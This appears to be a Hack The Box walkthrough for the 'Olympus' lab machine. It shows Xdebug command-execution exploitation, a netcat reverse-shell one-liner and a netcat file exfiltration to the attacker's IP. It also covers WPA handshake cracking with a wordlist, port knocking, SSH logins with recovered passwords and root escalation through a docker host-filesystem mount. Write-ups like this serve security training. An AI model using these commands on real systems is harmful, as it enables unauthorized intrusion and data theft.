+ Encoding Process : Progressive DCT, Huffman coding
+ Bits Per Sample : 8
+ Color Components : 3
+ Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
+ Image Size : 480x640
+ Megapixels : 0.307
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → steghide extract -sf zeus.jpg
+ Enter passphrase:
+ steghide: could not extract any data with that passphrase!
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → strings zeus.jpg
+
+
+
+Doesn't seem like we get anything too obvious, and by using the strings command we don't seem to find anything either, so let's continue by investigating the dns service running on port 53:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → dig axfr @10.10.10.83 olympus.htb
+
+ ; <<****>> DiG 9.11.16-2-Debian <<****>> axfr @10.10.10.83 olympus.htb
+ ; (1 server found)
+ ;; global options: +cmd
+ ; Transfer failed.
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → dig @10.10.10.83 olympus.htb
+
+ ; <<****>> DiG 9.11.16-2-Debian <<****>> @10.10.10.83 olympus.htb
+ ; (1 server found)
+ ;; global options: +cmd
+ ;; Got answer:
+ ;; ->>HEADER <<****- opcode: QUERY, status: SERVFAIL, id: 5749
+ ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
+
+ ;; OPT PSEUDOSECTION:
+ ; EDNS: version: 0, flags:; udp: 4096
+ ;; QUESTION SECTION:
+ ;olympus.htb. IN A
+
+ ;; Query time: 75 msec
+ ;; SERVER: 10.10.10.83#53(10.10.10.83)
+ ;; WHEN: Wed Mar 18 08:34:17 GMT 2020
+ ;; MSG SIZE rcvd: 40
+
+And we seem to get a domain name ! olympus.htb seems to be the one, so let's add it to our /etc/hosts file.
+
+
+ λ root [ 10.10.14.11/23 ] [/home/nihilist]
+ → echo '10.10.10.83 olympus.htb' >> /etc/hosts
+
+
+Now that's done, let's dirsearch the box once again, but this time with the domain name that we added:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → dirsearch -u http://olympus.htb -t 50 -e txt,html,php,xml -x 403
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u -e -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: txt, html, php, xml | HTTP method: get | Threads: 50 | Wordlist size: 7124
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-03-18_08-36-49.log
+
+ Target: http://olympus.htb
+
+ [08:36:49] Starting:
+ [08:37:05] 200 - 66KB - /favicon.ico
+ [08:37:07] 200 - 314B - /index.php
+ [08:37:07] 200 - 314B - /index.php/login/
+
+
+
+To which we get the same results:
+
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → ls
+ zeus.jpg
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → wget http://olympus.htb/zeus.jpg -O zeus2.jpg
+ --2020-03-18 08:40:59-- http://olympus.htb/zeus.jpg
+ Resolving olympus.htb (olympus.htb)... 10.10.10.83
+ Connecting to olympus.htb (olympus.htb)|10.10.10.83|:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 37144 (36K) [image/jpeg]
+ Saving to: ‘zeus2.jpg’
+
+ zeus2.jpg 100%[===================>] 36.27K 209KB/s in 0.2s
+
+ 2020-03-18 08:40:59 (209 KB/s) - ‘zeus2.jpg’ saved [37144/37144]
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → md5sum zeus.jpg && md5sum zeus2.jpg
+ a9e247b275edb0140a8b507fdd21e7ab zeus.jpg
+ a9e247b275edb0140a8b507fdd21e7ab zeus2.jpg
+
+
+By downloading the image from olympus.htb, and by using md5sum we see that both images are exactly the same, so let's use nikto to try and see if there's anything else we can find on the webserver. and while it runs, we check out the response headers from the webpage itself : Firefox > F12 > Network > Response Headers
+
+
+
+Into which we (nikto aswell) see something odd : Xdebug 2.5.5 so let's do a quick searchsploit on it to see if there are any public exploits for us to use:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → searchsploit Xdebug 2
+ ------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ------------------------------------------- ----------------------------------------
+ xdebug < 2.5.5 - OS Command Execution (Met | exploits/php/remote/44568.rb
+ ------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+ Papers: No Result
+
+
+Here we see that we have a OS Command Execution Metasploit exploit, so let's check it out:
+
+
+ msf5 > search xdebug
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/unix/http/xdebug_unauth_exec 2017-09-17 excellent Yes xdebug Unauthenticated OS Command Execution
+
+
+ msf5 > use 0
+ msf5 exploit(unix/http/xdebug_unauth_exec) > show options
+
+ Module options (exploit/unix/http/xdebug_unauth_exec):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ PATH /index.php yes Path to target webapp
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 80 yes The target port (TCP)
+ SRVHOST 0.0.0.0 yes Callback host for accepting connections
+ SRVPORT 9000 yes Port to listen for the debugger
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ VHOST no HTTP server virtual host
+
+
+ Payload options (php/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ LHOST yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Automatic
+
+
+Metasploit has it with it's options, but let's see if we can make our own by copying the script locally and by making a python version:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → locate 44568.rb
+ /usr/share/exploitdb/exploits/php/remote/44568.rb
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → cp /usr/share/exploitdb/exploits/php/remote/44568.rb .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → nano 44568.rb
+
+
+So we make the correct python script following the logic behind metasploit's exploit we found earlier
+
+
+
+And from here we simply use the system() function to pass in our reverse shell one liner pointing at our port 9001:
+
+
+ system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 9001 >/tmp/f')
+
+
+` 
+
+And we get a reverse shell as www-data ! Now we don't have access to any user flag right away, but in the /home/zeus directory we seem to have access to an airgeddon directory, so let's check it out:
+
+
+ $ ls -lash
+ total 12K
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 .
+ 4.0K drwxr-xr-x 1 root root 4.0K Apr 8 2018 ..
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 airgeddon
+ $ ls -lash airgeddon
+ total 1.1M
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 .
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 ..
+ 4.0K -rw-r--r-- 1 zeus zeus 264 Apr 8 2018 .editorconfig
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 .git
+ 4.0K -rw-r--r-- 1 zeus zeus 230 Apr 8 2018 .gitattributes
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 .github
+ 4.0K -rw-r--r-- 1 zeus zeus 89 Apr 8 2018 .gitignore
+ 16K -rw-r--r-- 1 zeus zeus 16K Apr 8 2018 CHANGELOG.md
+ 4.0K -rw-r--r-- 1 zeus zeus 3.2K Apr 8 2018 CODE_OF_CONDUCT.md
+ 8.0K -rw-r--r-- 1 zeus zeus 6.3K Apr 8 2018 CONTRIBUTING.md
+ 4.0K -rw-r--r-- 1 zeus zeus 3.3K Apr 8 2018 Dockerfile
+ 36K -rw-r--r-- 1 zeus zeus 35K Apr 8 2018 LICENSE.md
+ 8.0K -rw-r--r-- 1 zeus zeus 4.4K Apr 8 2018 README.md
+ 292K -rw-r--r-- 1 zeus zeus 291K Apr 8 2018 airgeddon.sh
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 binaries
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 captured
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 imgs
+ 16K -rw-r--r-- 1 zeus zeus 16K Apr 8 2018 known_pins.db
+ 672K -rw-r--r-- 1 zeus zeus 670K Apr 8 2018 language_strings.sh
+ 4.0K -rw-r--r-- 1 zeus zeus 33 Apr 8 2018 pindb_checksum.txt
+
+
+In it we see the captured directory, so let's check what's in it:
+
+
+ $ cd captured
+ $ ls -lash
+ total 304K
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 .
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 ..
+ 292K -rw-r--r-- 1 zeus zeus 291K Apr 8 2018 captured.cap
+ 4.0K -rw-r--r-- 1 zeus zeus 57 Apr 8 2018 papyrus.txt
+
+ $ cat papyrus.txt
+ Captured while flying. I'll banish him to Olympia - Zeus
+
+ $ file captured.cap
+ captured.cap: tcpdump capture file (little-endian) - version 2.4 (802.11, capture length 65535)
+
+
+
+Now we seem to have a riddle here, trying to find "Olympia", and we have a captured.cap file which is a tcpdump capture file v2.4 so let's send it over to our machine:
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → nc -lvnp 9002 > captured.cap
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9002
+ Ncat: Listening on 0.0.0.0:9002
+
+
+` _Terminal 2:_
+
+
+ $ cat captured.cap | nc 10.10.14.11 9002
+
+
+` _Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → nc -lvnp 9002 > captured.cap
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9002
+ Ncat: Listening on 0.0.0.0:9002
+ Ncat: Connection from 10.10.10.83.
+ Ncat: Connection from 10.10.10.83:55836.
+
+
+
+And we verify that we have the same file by using md5sum:
+
+
+
+And we have the same file ! so let's use aircrack-ng to see if what's in this captured.cap file.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → aircrack-ng captured.cap
+ Reading packets, please wait...
+ Opening captured.cap
+ Read 6498 packets.
+
+ # BSSID ESSID Encryption
+
+ 1 F4:EC:38:AB:A8:A9 Too_cl0se_to_th3_Sun WPA (1 handshake)
+
+ Choosing first network as target.
+
+ Reading packets, please wait...
+ Opening captured.cap
+ Read 6498 packets.
+
+ 1 potential targets
+
+ Please specify a dictionary (option -w).
+
+
+And we get a password ! so let's use rockyou.txt to see if we can bruteforce the key using aircrack-ng:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → aircrack-ng -e 'Too_cl0se_to_th3_Sun' -w /usr/share/wordlists/rockyou.txt captured.cap
+
+ Time left: 17 minutes, 7 seconds 54.02%
+
+ KEY FOUND! [ flightoficarus ]
+
+
+ Master Key : FA C9 FB 75 B7 7E DC 86 CC C0 D5 38 88 75 B8 5A
+ 88 3B 75 31 D9 C3 23 C8 68 3C DB FA 0F 67 3F 48
+
+ Transient Key : 46 7D FD D8 1A E5 1A 98 50 C8 DD 13 26 E7 32 7C
+ DE E7 77 4E 83 03 D9 24 74 81 30 84 AD AD F8 10
+ 21 62 1F 60 15 02 0C 5C 1C 84 60 FA 34 DE C0 4F
+ 35 F6 4F 03 A2 0F 8F 6F 5E 20 05 27 E1 73 E0 73
+
+ EAPOL HMAC : AC 1A 73 84 FB BF 75 9C 86 CF 5B 5A F4 8A 4C 38
+
+
+And we found the key ! We now have a few words that might come handy
+
+
+ icarus
+ Too_cl0se_to_th3_Sun
+ flightoficarus
+ zeus
+
+
+Now since our nmap scan returned a filtered ssh service running on port 22 we run another nmap scan to see where we could potentially use those credentials:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → nmap -F 10.10.10.83 --top-ports 10000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 09:34 GMT
+ Nmap scan report for olympus.htb (10.10.10.83)
+ Host is up (0.067s latency).
+ Not shown: 8316 closed ports
+ PORT STATE SERVICE
+ 22/tcp filtered ssh
+ 53/tcp open domain
+ 80/tcp open http
+ 2222/tcp open EtherNetIP-1
+
+ Nmap done: 1 IP address (1 host up) scanned in 7.46 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → nmap -sCV -p2222 10.10.10.83
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 09:35 GMT
+ Nmap scan report for olympus.htb (10.10.10.83)
+ Host is up (0.067s latency).
+
+ PORT STATE SERVICE VERSION
+ 2222/tcp open ssh (protocol 2.0)
+ | fingerprint-strings:
+ | NULL:
+ |_ SSH-2.0-City of olympia
+ | ssh-hostkey:
+ | 2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 (RSA)
+ | 256 79:90:c0:3d:43:6c:8d:72:19:60:45:3c:f8:99:14:bb (ECDSA)
+ |_ 256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 (ED25519)
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port2222-TCP:V=7.80%I=7%D=3/18%Time=5E71EB4D%P=x86_64-pc-linux-gnu%r(NU
+ SF:LL,29,"SSH-2\.0-City\x20of\x20olympia\x20\x20\x20\x20\x20\x20\x20\x20\x
+ SF:20\x20\x20\x20\x20\x20\x20\x20\r\n");
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 9.17 seconds
+
+
+
+And here we see another port opened with SSH on it ! So we try to login as the user we guessed was icarus with his password : Too_cl0se_to_th3_Sun
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → ssh -p 2222 icarus@10.10.10.83
+ The authenticity of host '[10.10.10.83]:2222 ([10.10.10.83]:2222)' can't be established.
+ ECDSA key fingerprint is SHA256:uyZtmsYFq/Ac58+SEgLsL+NK05LlH2qwp2EXB1DxlO4.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '[10.10.10.83]:2222' (ECDSA) to the list of known hosts.
+ icarus@10.10.10.83's password:
+
+ Last login: Sun Apr 15 16:44:40 2018 from 10.10.14.4
+ icarus@620b296204a3:~$ id
+ uid=1000(icarus) gid=1000(icarus) groups=1000(icarus)
+ icarus@620b296204a3:~$ cat user.txt
+ cat: user.txt: No such file or directory
+ icarus@620b296204a3:~$ ls
+ help_of_the_gods.txt
+ icarus@620b296204a3:~$ cat help_of_the_gods.txt
+
+ Athena goddess will guide you through the dark...
+
+ Way to Rhodes...
+ ctfolympus.htb
+
+
+
+and we get a shell session as icarus ! Although we still need to find the user flag, being hinted yet again with a riddle about the Athena goddess and most importantly the domain name ctfolympus.htb so let's use dig just like before to enumerate this domainname:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → dig axfr @10.10.10.83 ctfolympus.htb
+
+ ; <<>> DiG 9.11.16-2-Debian <<>> axfr @10.10.10.83 ctfolympus.htb
+ ; (1 server found)
+ ;; global options: +cmd
+ ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
+ ctfolympus.htb. 86400 IN TXT "prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
+ ctfolympus.htb. 86400 IN A 192.168.0.120
+ ctfolympus.htb. 86400 IN NS ns1.ctfolympus.htb.
+ ctfolympus.htb. 86400 IN NS ns2.ctfolympus.htb.
+ ctfolympus.htb. 86400 IN MX 10 mail.ctfolympus.htb.
+ crete.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
+ hades.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
+ mail.ctfolympus.htb. 86400 IN A 192.168.0.120
+ ns1.ctfolympus.htb. 86400 IN A 192.168.0.120
+ ns2.ctfolympus.htb. 86400 IN A 192.168.0.120
+ rhodes.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
+ RhodesColossus.ctfolympus.htb. 86400 IN TXT "Here lies the great Colossus of Rhodes"
+ www.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
+ ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
+ ;; Query time: 76 msec
+ ;; SERVER: 10.10.10.83#53(10.10.10.83)
+ ;; WHEN: Wed Mar 18 09:39:57 GMT 2020
+ ;; XFR size: 15 records (messages 1, bytes 475)
+
+
+From here we see that we have quite a few of subdomains to work with, along with a riddle mentionning "Prometheus opening a portal to Hades (3456 8234 62431) and St34l_th3_F1re!" So maybe we have credentials, but before that let's list every subdomain we found before adding them to our /etc/hosts file:
+
+
+ echo '10.10.10.83 ctfolympus.htb'
+
+
+
+ crete.ctfolympus.htb
+ hades.ctfolympus.htb
+ mail.ctfolympus.htb
+ ns1.ctfolympus.htb
+ ns2.ctfolympus.htb
+ rhodes.ctfolympus.htb
+ RhodesColossus.ctfolympus.htb
+ www.ctfolympus.htb
+ ctfolympus.htb
+
+
+
+ echo '10.10.10.83 ctfolympus.htb'
+
+
+We try to ssh as the user prometheus with his assumed password St34l_th3_F1re :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → ssh prometheus@10.10.10.83 -p2222
+ prometheus@10.10.10.83's password:
+ Permission denied, please try again.
+ prometheus@10.10.10.83's password:
+ Permission denied, please try again.
+ prometheus@10.10.10.83's password:
+ prometheus@10.10.10.83: Permission denied (publickey,password).
+
+
+
+ icarus@620b296204a3:~$ cat /etc/passwd | grep prometheus
+ icarus@620b296204a3:~$
+
+
+We can't ssh on port 2222 as the user prometheus, because he isn't even an user on the box, so assuming from the hades riddle, we can assume that it is about port knocking just like on the box [Nineveh](10.html):
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → for x in 3456 8234 62431 22; do nmap -Pn --max-retries 0 -p $x 10.10.10.83; done
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 09:52 GMT
+ Nmap scan report for olympus.htb (10.10.10.83)
+ Host is up (0.065s latency).
+
+ PORT STATE SERVICE
+ 3456/tcp closed vat
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 09:52 GMT
+ Nmap scan report for olympus.htb (10.10.10.83)
+ Host is up (0.062s latency).
+
+ PORT STATE SERVICE
+ 8234/tcp closed unknown
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 09:52 GMT
+ Nmap scan report for olympus.htb (10.10.10.83)
+ Host is up (0.060s latency).
+
+ PORT STATE SERVICE
+ 62431/tcp closed unknown
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 09:52 GMT
+ Nmap scan report for olympus.htb (10.10.10.83)
+ Host is up (0.067s latency).
+
+ PORT STATE SERVICE
+ 22/tcp open ssh
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
+
+
+And there we have it ! we have been able to open port 22 by knocking on the 3 aforementionned ports so let's try to ssh as the user prometheus:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → for x in 3456 8234 62431; do nmap -Pn --max-retries 0 -p $x 10.10.10.83; done ;sshpass -p 'St34l_th3_F1re!' ssh -oStrictHostKeyChecking=no prometheus@10.10.10.83
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 09:55 GMT
+ Nmap scan report for olympus.htb (10.10.10.83)
+ Host is up (0.065s latency).
+
+ PORT STATE SERVICE
+ 3456/tcp closed vat
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 09:55 GMT
+ Nmap scan report for olympus.htb (10.10.10.83)
+ Host is up (0.064s latency).
+
+ PORT STATE SERVICE
+ 8234/tcp closed unknown
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 09:55 GMT
+ Nmap scan report for olympus.htb (10.10.10.83)
+ Host is up (0.070s latency).
+
+ PORT STATE SERVICE
+ 62431/tcp closed unknown
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
+ Warning: Permanently added '10.10.10.83' (ECDSA) to the list of known hosts.
+
+ Welcome to
+
+ ) (
+ ( /( ) )\ ) (
+ )\()) ( /( (()/( ))\ (
+ ((_)\ )(_)) ((_))/((_))\
+ | |(_)((_)_ _| |(_)) ((_)
+ | ' \ / _` |/ _` |/ -_)(_-<
+ |_||_|\__,_|\__,_|\___|/__/
+
+ prometheus@olympus:~$ cat user.txt
+ 8aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now that we are on the box let's enumerate it a bit :
+
+
+ prometheus@olympus:~$ sudo -l
+
+ We trust you have received the usual lecture from the local System
+ Administrator. It usually boils down to these three things:
+
+ #1) Respect the privacy of others.
+ #2) Think before you type.
+ #3) With great power comes great responsibility.
+
+ [sudo] password for prometheus:
+ Sorry, user prometheus may not run sudo on olympus.
+ prometheus@olympus:~$ netstat -alvnp | grep LISTEN
+
+
+Doesn't seem that we can run sudo -l as usual so we try to see what's running on the machine by using ps -auxw
+
+
+ prometheus@olympus:~$ ps auxw
+ USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
+ root 1 0.0 0.3 56992 6812 ? Ss Mar17 0:01 /sbin/init
+ [...]
+ root 276 0.0 0.2 51236 5540 ? Ss Mar17 0:00 /lib/systemd/systemd-journald
+ root 279 0.0 0.5 207504 10556 ? Ssl Mar17 0:27 /usr/bin/vmtoolsd
+ root 280 0.0 0.0 0 0 ? S Mar17 0:00 [kauditd]
+ root 293 0.0 0.2 46828 5004 ? Ss Mar17 0:00 /lib/systemd/systemd-udevd
+ systemd+ 359 0.0 0.1 127284 4052 ? Ssl Mar17 0:02 /lib/systemd/systemd-timesyncd
+ root 365 0.0 0.0 0 0 ? S Mar17 0:00 [ttm_swap]
+ root 438 0.0 0.1 29664 2868 ? Ss Mar17 0:00 /usr/sbin/cron -f
+ root 439 0.0 0.1 35920 3292 ? Ss Mar17 0:01 /usr/sbin/irqbalance --foreground
+ root 440 0.0 0.9 153488 18532 ? Ss Mar17 0:00 /usr/bin/VGAuthService
+ message+ 441 0.0 0.1 45120 3724 ? Ss Mar17 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
+ root 456 0.0 0.1 250116 3304 ? Ssl Mar17 0:00 /usr/sbin/rsyslogd -n
+ root 457 0.0 0.2 46420 4804 ? Ss Mar17 0:00 /lib/systemd/systemd-logind
+ root 562 0.0 0.1 8572 3876 ? Ss Mar17 0:00 /usr/sbin/knockd -i enp0s3
+ root 565 0.1 3.1 585408 65468 ? Ssl Mar17 0:59 /usr/bin/dockerd -H fd://
+ root 570 0.0 0.0 14536 1780 tty1 Ss+ Mar17 0:00 /sbin/agetty --noclear tty1 linux
+ root 580 0.0 0.2 69944 5452 ? Ss Mar17 0:00 /usr/sbin/sshd -D
+ root 591 0.0 1.1 400308 23004 ? Ssl Mar17 0:41 docker-containerd --config /var/run/docker/containerd/containerd.toml
+ root 983 0.0 0.1 51488 3600 ? Sl Mar17 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 53 -container-ip 172.18.0.2 -container-port 53
+ root 989 0.0 0.1 51488 3708 ? Sl Mar17 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 80 -container-ip 172.20.0.2 -container-port 80
+ root 1004 0.0 0.2 206028 5704 ? Sl Mar17 0:03 /usr/bin/docker-proxy -proto udp -host-ip 0.0.0.0 -host-port 53 -container-ip 172.18.0.2 -container-port 53
+ root 1005 0.0 0.1 51488 3636 ? Sl Mar17 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 2222 -container-ip 172.19.0.2 -container-port 22
+ root 1018 0.0 0.1 7648 3836 ? Sl Mar17 0:02 docker-containerd-shim -namespace moby -workdir /var/lib/docker/containerd/daemon/io.containerd.runtime.v1.linux/moby/f00ba96171c58d55c6
+ root 1022 0.0 0.1 7648 4036 ? Sl Mar17 0:00 docker-containerd-shim -namespace moby -workdir /var/lib/docker/containerd/daemon/io.containerd.runtime.v1.linux/moby/ce2ecb56a96ee3d95d
+ root 1023 0.0 0.2 7648 4784 ? Sl Mar17 0:00 docker-containerd-shim -namespace moby -workdir /var/lib/docker/containerd/daemon/io.containerd.runtime.v1.linux/moby/620b296204a38a1bc2
+ systemd+ 1058 0.0 1.2 289576 24668 ? Ssl Mar17 0:17 /usr/sbin/named -g -c /etc/bind/named.conf -u bind
+ root 1067 0.0 0.9 175340 20136 ? Ss Mar17 0:02 apache2 -DFOREGROUND
+ root 1077 0.0 0.2 65504 6004 ? Ss Mar17 0:00 /usr/sbin/sshd -D
+ root 1756 0.0 0.0 0 0 ? S 01:02 0:00 [kworker/1:2]
+ root 1831 0.0 0.0 0 0 ? S 01:32 0:00 [kworker/0:0]
+ www-data 1832 0.0 0.6 175640 13272 ? S 01:36 0:00 apache2 -DFOREGROUND
+ www-data 1834 0.0 0.6 175648 13276 ? S 01:36 0:00 apache2 -DFOREGROUND
+ www-data 1851 0.0 0.6 175632 13264 ? S 01:36 0:00 apache2 -DFOREGROUND
+ www-data 1865 0.0 0.6 175768 13424 ? S 01:36 0:00 apache2 -DFOREGROUND
+ www-data 1871 0.0 0.6 175640 13272 ? S 01:36 0:00 apache2 -DFOREGROUND
+ www-data 1873 0.0 0.6 175640 13272 ? S 01:37 0:00 apache2 -DFOREGROUND
+ www-data 1874 0.0 0.6 175768 13644 ? S 01:37 0:00 apache2 -DFOREGROUND
+ www-data 1878 0.0 0.6 175768 13436 ? S 01:37 0:00 apache2 -DFOREGROUND
+ www-data 1881 0.0 0.6 175632 13264 ? S 01:37 0:00 apache2 -DFOREGROUND
+ www-data 1888 0.0 0.6 175640 13272 ? S 01:37 0:00 apache2 -DFOREGROUND
+ root 1895 0.0 0.0 0 0 ? S 02:01 0:00 [kworker/1:1]
+ root 1949 0.0 0.3 90476 6588 ? Ss 02:36 0:00 sshd: icarus [priv]
+ prometh+ 1953 0.0 0.1 90476 3272 ? S 02:36 0:00 sshd: icarus@pts/0
+ prometh+ 1954 0.0 0.1 18240 3428 pts/0 Ss+ 02:36 0:00 -bash
+ root 1969 0.0 0.0 0 0 ? S 02:49 0:00 [kworker/0:1]
+ root 1976 0.0 0.0 0 0 ? S 02:54 0:00 [kworker/0:2]
+ root 1985 0.0 0.3 99336 7108 ? Ss 02:55 0:00 sshd: prometheus [priv]
+ prometh+ 1987 0.0 0.3 65036 6176 ? Ss 02:55 0:00 /lib/systemd/systemd --user
+ prometh+ 1988 0.0 0.0 84576 1632 ? S 02:55 0:00 (sd-pam)
+ prometh+ 1993 0.0 0.1 99336 4020 ? S 02:55 0:00 sshd: prometheus@pts/0
+ prometh+ 1994 0.0 0.2 21192 4996 pts/0 Ss 02:55 0:00 -bash
+ prometh+ 2010 0.0 0.1 38304 3288 pts/0 R+ 02:58 0:00 ps auxw
+
+
+
+Here we are hinted towards docker running on the box, so let's enumerate it :
+
+
+ prometheus@olympus:~$ docker images
+ REPOSITORY TAG IMAGE ID CREATED SIZE
+ crete latest 31be8149528e 23 months ago 450MB
+ olympia latest 2b8904180780 23 months ago 209MB
+ rodhes latest 82fbfd61b8c1 23 months ago 215MB
+
+
+We know about crete, but we don't know about olympia yet so let's try to get a shell in it's docker image :
+
+
+ prometheus@olympus:~$ docker run --rm -i -t -v /:/hostOS olympia /bin/bash
+ root@72fd5d0030ac:/# uname -a
+ Linux 72fd5d0030ac 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 x86_64 x86_64 GNU/Linux
+ root@72fd5d0030ac:/# whoami
+ root
+ root@72fd5d0030ac:/# cat /root/root.txt
+ cat: /root/root.txt: No such file or directory
+
+
+
+And we have root access to this docker image ! however root.txt isn't where it should be so let's poke around a little further:
+
+
+ root@72fd5d0030ac:/# cd /
+ root@72fd5d0030ac:/# ls
+ bin boot dev etc home hostOS lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
+ root@72fd5d0030ac:/# cd hostOS
+ root@72fd5d0030ac:/hostOS# ls
+ bin boot dev etc home initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old
+ root@72fd5d0030ac:/hostOS# cd root
+ root@72fd5d0030ac:/hostOS/root# ls
+ root.txt
+ root@72fd5d0030ac:/hostOS/root# cat root.txt
+ abXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And there we have it ! we have been able to print the root flag that was oddly placed in the /hostOS/root/ directory.
+
+## **Conclusion**
